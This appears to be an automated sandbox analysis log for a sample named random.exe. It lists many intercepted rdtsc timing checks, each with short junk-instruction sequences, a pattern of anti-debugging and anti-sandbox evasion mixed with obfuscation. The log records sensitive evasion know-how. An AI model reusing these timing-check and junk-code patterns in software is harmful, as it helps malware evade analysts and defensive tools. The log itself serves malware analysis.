      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E43B0 second address: 10E43CA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jmp 00007FA8D8E164B1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E453A second address: 10E453E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E46BD second address: 10E46D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jnp 00007FA8D8E164AEh 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E46D0 second address: 10E46D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E46D5 second address: 10E46E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA8D8E164A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E46E1 second address: 10E4721 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FA8D8E1DD02h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FA8D8E1DCFEh 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 js 00007FA8D8E1DCFAh 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 pop eax 0x00000022 jl 00007FA8D8E1DD02h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10E4721 second address: 10E4727 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB33F second address: 10EB35A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB35A second address: 10EB37C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA8D8E164C4h 0x00000008 jmp 00007FA8D8E164B8h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB37C second address: 10EB387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB387 second address: 10EB3A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B9h 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB3A5 second address: 10EB3AA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB642 second address: 10EB669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jmp 00007FA8D8E164B8h 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FA8D8E164A8h 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EB8F3 second address: 10EB8F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EC97F second address: 10EC983 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10EC983 second address: 10EC98F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push esi 0x0000000a pop esi 0x0000000b pop esi 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10ECCA4 second address: 10ECCA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10ECCA8 second address: 10ECCAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0F56 second address: 10F0F73 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164B7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F002F second address: 10F0033 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0033 second address: 10F003B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F003B second address: 10F0045 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA8D8E1DCFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0045 second address: 10F004D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F01AC second address: 10F01ED instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA8D8E1DCF6h 0x00000008 jg 00007FA8D8E1DCF6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 pushad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 jl 00007FA8D8E1DCF6h 0x0000001b jmp 00007FA8D8E1DD03h 0x00000020 push esi 0x00000021 pop esi 0x00000022 popad 0x00000023 jns 00007FA8D8E1DCF8h 0x00000029 push eax 0x0000002a push edx 0x0000002b jne 00007FA8D8E1DCF6h 0x00000031 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F04C8 second address: 10F04CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F04CC second address: 10F04E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD04h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F062C second address: 10F0660 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c jmp 00007FA8D8E164B4h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA8D8E164AEh 0x00000019 push ebx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0660 second address: 10F0665 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0966 second address: 10F096A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F096A second address: 10F0970 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0970 second address: 10F097F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FA8D8E164B0h 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0C59 second address: 10F0C5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0C5F second address: 10F0C63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F0C63 second address: 10F0C6D instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA8D8E1DCFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F5881 second address: 10F5885 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10F5885 second address: 10F588B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FC930 second address: 10FC93C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA8D8E164A6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCAA6 second address: 10FCAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCAAA second address: 10FCABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jnc 00007FA8D8E164A6h 0x0000000d jns 00007FA8D8E164A6h 0x00000013 pop ebx 0x00000014 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCC3A second address: 10FCC40 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCDAE second address: 10FCDCE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCF32 second address: 10FCF4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jbe 00007FA8D8E1DD07h 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FA8D8E1DCFFh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FCF4E second address: 10FCF80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c js 00007FA8D8E164A6h 0x00000012 pop ebx 0x00000013 push edx 0x00000014 jmp 00007FA8D8E164B5h 0x00000019 push esi 0x0000001a pop esi 0x0000001b pop edx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 10FE182 second address: 10FE187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1106063 second address: 1106068 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1105EBC second address: 1105ED9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA8D8E1DD05h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1105ED9 second address: 1105EDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1105EDF second address: 1105EE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1105EE5 second address: 1105EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110AA93 second address: 110AAA8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007FA8D8E1DD00h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110A49B second address: 110A49F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110A49F second address: 110A4AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFAh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110A791 second address: 110A79E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FA8D8E164A6h 0x0000000d rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110A79E second address: 110A7A8 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 110A7A8 second address: 110A7C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA8D8E164B8h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117E05 second address: 1117E09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117E09 second address: 1117E11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117E11 second address: 1117E39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFAh 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jmp 00007FA8D8E1DD07h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117E39 second address: 1117E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FA8D8E164A6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push edi 0x00000012 pop edi 0x00000013 jl 00007FA8D8E164A6h 0x00000019 jnc 00007FA8D8E164A6h 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FA8D8E164B9h 0x00000027 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117E74 second address: 1117E78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117A04 second address: 1117A16 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117A16 second address: 1117A1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117A1C second address: 1117A22 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1117BB5 second address: 1117BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11209E5 second address: 11209EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11209EA second address: 11209EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112B5E2 second address: 112B5E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112B5E8 second address: 112B5EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112B5EE second address: 112B60F instructions: 0x00000000 rdtsc 0x00000002 jg 00007FA8D8E164A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FA8D8E164A6h 0x00000011 pop eax 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push ebx 0x00000015 push ecx 0x00000016 pushad 0x00000017 popad 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b js 00007FA8D8E164A6h 0x00000021 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FC4B second address: 112FC72 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA8D8E1DCF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA8D8E1DD09h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FC72 second address: 112FC76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FC76 second address: 112FC7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FC7A second address: 112FC8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a jg 00007FA8D8E164A6h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FC8A second address: 112FCB3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DD05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c jbe 00007FA8D8E1DCF6h 0x00000012 pop edi 0x00000013 popad 0x00000014 push edi 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FCB3 second address: 112FCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FCB9 second address: 112FCC3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 112FCC3 second address: 112FCC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113726A second address: 1137276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jo 00007FA8D8E1DCF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1137276 second address: 113727D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1137788 second address: 113779E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jng 00007FA8D8E1DCF6h 0x0000000f js 00007FA8D8E1DCF6h 0x00000015 popad 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113779E second address: 11377A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11377A3 second address: 11377A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11377A9 second address: 11377AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 1137BD8 second address: 1137BDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113C249 second address: 113C261 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jc 00007FA8D8E164ACh 0x0000000b jnl 00007FA8D8E164A6h 0x00000011 pop esi 0x00000012 push edi 0x00000013 push edi 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113F72E second address: 113F738 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113F738 second address: 113F73D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 113F73D second address: 113F775 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FA8D8E1DD08h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d pushad 0x0000000e popad 0x0000000f pop eax 0x00000010 pushad 0x00000011 jbe 00007FA8D8E1DCF6h 0x00000017 jo 00007FA8D8E1DCF6h 0x0000001d jl 00007FA8D8E1DCF6h 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 114B2B3 second address: 114B2E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E164AFh 0x00000009 popad 0x0000000a jno 00007FA8D8E164B4h 0x00000010 je 00007FA8D8E164B2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 114B2E3 second address: 114B307 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FA8D8E1DCF6h 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FA8D8E1DD00h 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 114B307 second address: 114B30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11588BE second address: 11588C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 11585E7 second address: 11585ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D5C0 second address: 116D5C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D5C4 second address: 116D5E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E164B4h 0x00000007 jnp 00007FA8D8E164A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D5E2 second address: 116D5E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D5E7 second address: 116D5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D5ED second address: 116D61B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA8D8E1DD03h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pushad 0x0000000d jmp 00007FA8D8E1DCFBh 0x00000012 jbe 00007FA8D8E1DCF6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D920 second address: 116D924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\random.exeRDTSC instruction interceptor: First address: 116D924 second address: 116D936 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA8D8E1DCFEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
